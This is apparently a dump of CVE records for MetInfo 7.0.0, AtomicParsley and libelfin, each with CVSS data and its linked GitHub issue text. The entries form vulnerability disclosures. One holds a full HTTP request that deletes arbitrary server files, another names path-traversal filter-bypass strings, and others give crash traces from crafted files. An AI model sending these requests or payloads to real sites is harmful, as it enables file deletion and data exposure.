An issue in /admin/index.php?n=system&c=filept&a=doGetFileList of Metinfo v7.0.0 allows attackers to perform a directory traversal and access sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MRdoulestar/CodeAnalyse/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MRdoulestar/CodeAnalyse/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "5C5E62D8-4298-43B5-8FFE-B4653E7CC5EE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/MRdoulestar/CodeAnalyse/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "MRdoulestar", "CodeAnalyse" ]
Vulnerability Name: Metinfo CMS Background Directory Traversal Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0 Version: V7.0.0 The developer use str_replace to delete '../' in ```/app/system/system/admin/filept.class.php: doGetFileList```, but this is not safe enough becase it can be bypassed by '..././' or '....//'. ![image](https://user-images.githubusercontent.com/18137763/72400422-15d96180-3784-11ea-9830-2983ad9e431c.png) #### Payload ![image](https://user-images.githubusercontent.com/18137763/72400242-9c417380-3783-11ea-8735-352a6ca6f75d.png) ![image](https://user-images.githubusercontent.com/18137763/72400250-a1062780-3783-11ea-80de-94eeb40388bd.png)
MetInfo 7.0.0 Directory Traversal
https://api.github.com/repos/MRdoulestar/CodeAnalyse/issues/1/comments
0
2020-01-15T02:46:02Z
2020-01-15T02:46:02Z
https://github.com/MRdoulestar/CodeAnalyse/issues/1
549,932,445
1
2,262
CVE-2020-19305
2021-08-03T22:15:09.080
An issue in /app/system/column/admin/index.class.php of Metinfo v7.0.0 causes the indeximg parameter to be deleted when the column is deleted, allowing attackers to escalate privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/36.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MRdoulestar/CodeAnalyse/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/36.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MRdoulestar/CodeAnalyse/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "65A2CB16-CC11-4C8B-9CCC-7241BDD92E0C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/MRdoulestar/CodeAnalyse/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "MRdoulestar", "CodeAnalyse" ]
Vulnerability Name: Metinfo CMS Arbitrary File Deletion Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0 Version: V7.0.0 The indeximg field is also deleted when the column is deleted in ```/app/system/column/admin/index.class.php: _delolumn and fileUnlink```, and the indeximg field can be arbitrarily specified by the background user (in the function of adding a column picture). ![image](https://user-images.githubusercontent.com/18137763/72401324-a6b13c80-3786-11ea-9b69-a38331de9a84.png) ![image](https://user-images.githubusercontent.com/18137763/72401329-a749d300-3786-11ea-8a68-b4beab5ad64a.png) #### POC ![image](https://user-images.githubusercontent.com/18137763/72401453-00b20200-3787-11ea-8ef0-b820cef23fcc.png) ``` http POST /admin/?n=column&c=index&a=doEditorsave HTTP/1.1 Host: 10.211.55.6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------172210677418114399992143883321 Content-Length: 3178 Connection: keep-alive Referer: http://10.211.55.6/admin/ Cookie: PHPSESSID=268e9201bb4e347895ac2ac5afeb8334; Hm_lvt_520556228c0113270c0c772027905838=1578917132; Hm_lpvt_520556228c0113270c0c772027905838=1579013418; acc_auth=d9568Kwur%2Bv8GLHxl79ulL1w7lquML1KYclY%2FCd%2B9FMDQX9PAipAvJcX%2Bi5%2FFeRikywpRqDjIPMKsqnOnn9d2eQp; acc_key=RyFT5Up; arrlanguage=metinfo; re_url=http%3A%2F%2F_%2Fadmin%2F; met_auth=d751CuV3bOuwwoDzPcjuuPhQpMwDEBbdmRWy6IhPJrRO8ZfjbtwsJWPini3%2BIk0dwT9jmdCr0i4dyZ6TT0x84aIP; met_key=IMnix8E; admin_lang=cn; page_iframe_url=http://10.211.55.6/index.php?lang=cn&pageset=1 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="id" 79 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="wap_ok" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="no_order" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="name" yunsle -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="text_size" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="text_color" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="nav" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="new_windows" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="isshow" 1 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="ctitle" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="keywords" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="description" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="filename" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="index_num" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="namemark" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="indeximg"; filename="" Content-Type: application/octet-stream -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="indeximg" /var/www/metinfo/this_is_test.php -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="columnimg"; filename="" Content-Type: application/octet-stream -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="columnimg" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="icon" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="other_info" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="custom_info" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="access" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="display" 0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="nofollow" -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="submit_type" save -----------------------------172210677418114399992143883321-- ``` Then we delete the column, and the file will be deleted as well. ![image](https://user-images.githubusercontent.com/18137763/72401656-977ebe80-3787-11ea-8e7f-d2bafba35978.png)
MetInfo 7.0.0 Arbitrary File Deletion
https://api.github.com/repos/MRdoulestar/CodeAnalyse/issues/2/comments
0
2020-01-15T03:10:45Z
2020-01-15T03:10:45Z
https://github.com/MRdoulestar/CodeAnalyse/issues/2
549,938,551
2
2,263
CVE-2021-37231
2021-08-04T10:15:07.650
A stack-buffer-overflow occurs in Atomicparsley 20210124.204813.840499f through APar_readX() in src/util.cpp while parsing a crafted mp4 file because of the missing boundary check.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/issues/30" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/pull/31#issue-687280335" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-01" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/pull/31#issue-687280335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-01" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:atomicparsley_project:atomicparsley:20210124.204813.840499f:*:*:*:*:*:*:*", "matchCriteriaId": "71DAB386-AB25-4DF3-8AC3-299C54B3AA41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/wez/atomicparsley/issues/30
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "wez", "atomicparsley" ]
### S**ystem Configuration** - AtomicParsley version: atomicparsley-20210124.204813.840499f - Used arguments: -T 1 -t + - Environment (Operating system, version and so on): Ubuntu 20.04.2 64bit - Additional information: compilation with asan ==34075==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffd800 at pc 0x7ffff75e858d bp 0x7fffffffd540 sp 0x7fffffffcce8 WRITE of size 3936 at 0x7fffffffd800 thread T0 Program received signal SIGSEGV, Segmentation fault. #0 0x00007ffff6ffcc50 in ?? () from /lib/x86_64-linux-gnu/libgcc_s.so.1 #1 0x00007ffff6ffe77b in _Unwind_Backtrace () from /lib/x86_64-linux-gnu/libgcc_s.so.1 #2 0x00007ffff76b4a28 in ?? () from /lib/x86_64-linux-gnu/libasan.so.5 #3 0x00007ffff75af7f7 in ?? () from /lib/x86_64-linux-gnu/libasan.so.5 #4 0x00007ffff76949ed in ?? () from /lib/x86_64-linux-gnu/libasan.so.5 #5 0x00007ffff7694363 in ?? () from /lib/x86_64-linux-gnu/libasan.so.5 #6 0x00007ffff75e85af in ?? () from /lib/x86_64-linux-gnu/libasan.so.5 #7 0x00005555555fd597 in fread (__stream=0x615000000580, __n=0x203c, __size=0x1, __ptr=0x7fffffffd6cd) at /usr/include/x86_64-linux-gnu/bits/stdio2.h:297 #8 APar_readX (buffer=0x7fffffffd6cd "", ISObasemediafile=ISObasemediafile@entry=0x615000000580, pos=<optimized out>, length=0x203c) at /home/ubuntu/tmp/atomicparsley-20210124.204813.840499f/src/util.cpp:330 #9 0x00005555555a02d0 in APar_ExtractTrackDetails (uint32_buffer=uint32_buffer@entry=0x602000000050 "", isofile=isofile@entry=0x615000000580, track=track@entry=0x7fffffffd6a0, track_info=track_info@entry=0x7fffffffd6b0) at /home/ubuntu/tmp/atomicparsley-20210124.204813.840499f/src/extracts.cpp:1286 #10 0x00005555555a243b in APar_ExtractDetails (isofile=<optimized out>, optional_output=<optimized out>) at /home/ubuntu/tmp/atomicparsley-20210124.204813.840499f/src/extracts.cpp:1638 I've attached the file. Please download and check the file. [2021-05-04-09_19_50_0x5b55f77d_0xb1c1261c.zip](https://github.com/wez/atomicparsley/files/6790258/2021-05-04-09_19_50_0x5b55f77d_0xb1c1261c.zip)
A stack-buffer-overflow occurs while parsing a file
https://api.github.com/repos/wez/atomicparsley/issues/30/comments
3
2021-07-09T10:40:38Z
2021-07-13T06:14:18Z
https://github.com/wez/atomicparsley/issues/30
940,644,229
30
2,264
CVE-2021-37232
2021-08-04T10:15:07.983
A stack overflow vulnerability occurs in Atomicparsley 20210124.204813.840499f through APar_read64() in src/util.cpp due to the lack of buffer size of uint32_buffer while reading more bytes in APar_read64.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/commit/d72ccf06c98259d7261e0f3ac4fd8717778782c1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/issues/32" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-01" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/commit/d72ccf06c98259d7261e0f3ac4fd8717778782c1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/wez/atomicparsley/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-01" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:atomicparsley_project:atomicparsley:*:*:*:*:*:*:*:*", "matchCriteriaId": "FAF77988-5956-4860-8A5F-6E1EA4808EC3", "versionEndExcluding": null, "versionEndIncluding": "20210124.204813.840499f", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/wez/atomicparsley/issues/32
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "wez", "atomicparsley" ]
### **System Configuration** - AtomicParsley version: atomicparsley 020176f688d9efec68f1ce1b100e052bff1cfc2e - Used arguments: -T 1 -t + - Environment (Operating system, version and so on): Ubuntu 20.04.2 64bit - Additional information: compilation with asan **Description** Buffer overflow occurs while 64-bit fread(util.cpp/APar_read64() 299line) because the size of the buffer(extracts.cpp/APar_ExtractDetails() 1591line) is small (5 bytes) ==53286==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffd8c5 at pc 0x7ffff75e858d bp 0x7fffffffd5d0 sp 0x7fffffffcd78 WRITE of size 8 at 0x7fffffffd8c5 thread T0 #0 0x7ffff75e858c (/lib/x86_64-linux-gnu/libasan.so.5+0x6b58c) #1 0x5555555fd468 in fread /usr/include/x86_64-linux-gnu/bits/stdio2.h:297 #2 0x5555555fd468 in APar_read64(char*, _IO_FILE*, unsigned long) /home/ubuntu/tmp/atomicparsley/src/util.cpp:299 #3 0x5555555a05a0 in APar_ExtractTrackDetails(char*, _IO_FILE*, Trackage*, TrackInfo*) /home/ubuntu/tmp/atomicparsley/src/extracts.cpp:1247 #4 0x5555555a2883 in APar_ExtractDetails(_IO_FILE*, unsigned char) /home/ubuntu/tmp/atomicparsley/src/extracts.cpp:1635 #5 0x5555555c07e7 in real_main(int, char**) /home/ubuntu/tmp/atomicparsley/src/main.cpp:1637 #6 0x7ffff70650b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x55555559921d in _start (/home/ubuntu/tmp/atomicparsley/AtomicParsley+0x4521d) Address 0x7fffffffd8c5 is located in stack of thread T0 at offset 453 in frame #0 0x5555555a23df in APar_ExtractDetails(_IO_FILE*, unsigned char) /home/ubuntu/tmp/atomicparsley/src/extracts.cpp:1590 This frame has 3 object(s): [32, 36) 'track' (line 1592) [48, 384) 'track_info' (line 1632) [448, 453) 'uint32_buffer' (line 1591) <== Memory access at offset 453 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x6b58c) Shadow bytes around the buggy address: 0x10007fff7ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7ae0: f1 f1 f1 f1 04 f2 00 00 00 00 00 00 00 00 00 00 0x10007fff7af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7b10: f2 f2 f2 f2 f2 f2 f2 f2[05]f3 f3 f3 00 00 00 00 0x10007fff7b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7b40: f1 f1 f1 f1 f1 f1 01 f2 01 f2 01 f2 01 f2 01 f2 0x10007fff7b50: 01 f2 01 f2 01 f2 01 f2 01 f2 01 f2 01 f2 01 f2 0x10007fff7b60: 01 f2 01 f2 01 f2 01 f2 01 f2 01 f2 01 f2 01 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==53286==ABORTING I've attached the file. Please download and check the file. [2021-05-04-09_21_45_0xf6b390a1_0xb1c1261c.zip](https://github.com/wez/atomicparsley/files/6806091/2021-05-04-09_21_45_0xf6b390a1_0xb1c1261c.zip)
A stack-buffer-overflow occurs while parsing movie details
https://api.github.com/repos/wez/atomicparsley/issues/32/comments
1
2021-07-13T05:27:45Z
2021-07-13T06:13:38Z
https://github.com/wez/atomicparsley/issues/32
942,770,608
32
2,265
CVE-2020-24821
2021-08-04T15:15:08.477
A vulnerability in the dwarf::cursor::skip_form function of Libelfin v0.3 allows attackers to cause a denial of service (DOS) through a segmentation fault via a crafted ELF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/52" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-dwarfcursorskip_form-at-dwarfcursorcc191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-dwarfcursorskip_form-at-dwarfcursorcc191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/aclements/libelfin/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
Tested in Ubuntu 16.04, 64bit. The tested program is the example program dump-tree. The testcase is [dump_tree_segv3](https://github.com/xiaoxiongwang/function_bugs/blob/master/libelfin/dump_tree_segv3). I use the following command: ``` /path-to-libelfin/examples/dump-tree dump_tree_segv3 ``` and get: ``` Segmentation fault (core dumped) ``` I use **valgrind** to analysis the bug and get the below information (absolute path information omitted): ``` valgrind /path-to-libelfin/examples/dump-tree dump_tree_segv3 ==423== Memcheck, a memory error detector ==423== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==423== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==423== Command: /path-to-libelfin/examples/dump-tree dump_tree_segv3 ==423== ==423== Invalid read of size 1 ==423== at 0x42C998: uleb128 (internal.hh:154) ==423== by 0x42C998: dwarf::cursor::skip_form(dwarf::DW_FORM) (cursor.cc:147) ==423== by 0x433B4C: dwarf::die::read(unsigned long) (die.cc:51) ==423== by 0x414B7C: dwarf::unit::root() const (dwarf.cc:195) ==423== by 0x402CD0: main (dump-tree.cc:43) ==423== Address 0x750280b3 is not stack'd, malloc'd or (recently) free'd ==423== ==423== ==423== Process terminating with default action of signal 11 (SIGSEGV) ==423== Access not within mapped region at address 0x750280B3 ==423== at 0x42C998: uleb128 (internal.hh:154) ==423== by 0x42C998: dwarf::cursor::skip_form(dwarf::DW_FORM) (cursor.cc:147) ==423== by 0x433B4C: dwarf::die::read(unsigned long) (die.cc:51) ==423== by 0x414B7C: dwarf::unit::root() const (dwarf.cc:195) ==423== by 0x402CD0: main (dump-tree.cc:43) ==423== If you believe this happened as a result of a stack ==423== overflow in your program's main thread (unlikely but ==423== possible), you can try to increase the size of the ==423== main thread stack using the --main-stacksize= flag. ==423== The main thread stack size used in this run was 8388608. --- <0> ==423== ==423== HEAP SUMMARY: ==423== in use at exit: 80,652 bytes in 63 blocks ==423== total heap usage: 120 allocs, 57 frees, 88,208 bytes allocated ==423== ==423== LEAK SUMMARY: ==423== definitely lost: 0 bytes in 0 blocks ==423== indirectly lost: 0 bytes in 0 blocks ==423== possibly lost: 0 bytes in 0 blocks ==423== still reachable: 80,652 bytes in 63 blocks ==423== suppressed: 0 bytes in 0 blocks ==423== Rerun with --leak-check=full to see details of leaked memory ==423== ==423== For counts of detected and suppressed errors, rerun with: -v ==423== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault (core dumped) ``` I use **AddressSanitizer** to build ffjpeg and running it with the following command: ``` /path-to-libelfin/examples/dump-tree dump_tree_segv3 ``` This is the ASAN information (absolute path information omitted): ``` /path-to-libelfin-address/examples/dump-tree dump_tree_segv3 ASAN:SIGSEGV ================================================================= ==451==ERROR: AddressSanitizer: SEGV on unknown address 0x7f84237480b3 (pc 0x0000004167e8 bp 0x7fff99fc19f0 sp 0x7fff99fc18f0 T0) #0 0x4167e7 in dwarf::cursor::skip_form(dwarf::DW_FORM) /path-to-libelfin-address/dwarf/cursor.cc:191 #1 0x4183b3 in dwarf::die::read(unsigned long) /path-to-libelfin-address/dwarf/die.cc:51 #2 0x40f548 in dwarf::unit::root() const /path-to-libelfin-address/dwarf/dwarf.cc:195 #3 0x403357 in main /path-to-libelfin-address/examples/dump-tree.cc:43 #4 0x7f83b0c2982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x403878 in _start (/path-to-libelfin-address/examples/dump-tree+0x403878) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /path-to-libelfin-address/dwarf/cursor.cc:191 dwarf::cursor::skip_form(dwarf::DW_FORM) ==451==ABORTING ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS).
SEGV in function dwarf::cursor::skip_form at dwarf/cursor.cc:191
https://api.github.com/repos/aclements/libelfin/issues/52/comments
2
2020-08-15T13:18:45Z
2021-08-06T06:53:12Z
https://github.com/aclements/libelfin/issues/52
679,574,044
52
2,266
CVE-2020-24822
2021-08-04T15:15:08.593
A vulnerability in the dwarf::cursor::uleb function of Libelfin v0.3 allows attackers to cause a denial of service (DOS) through a segmentation fault via a crafted ELF file.
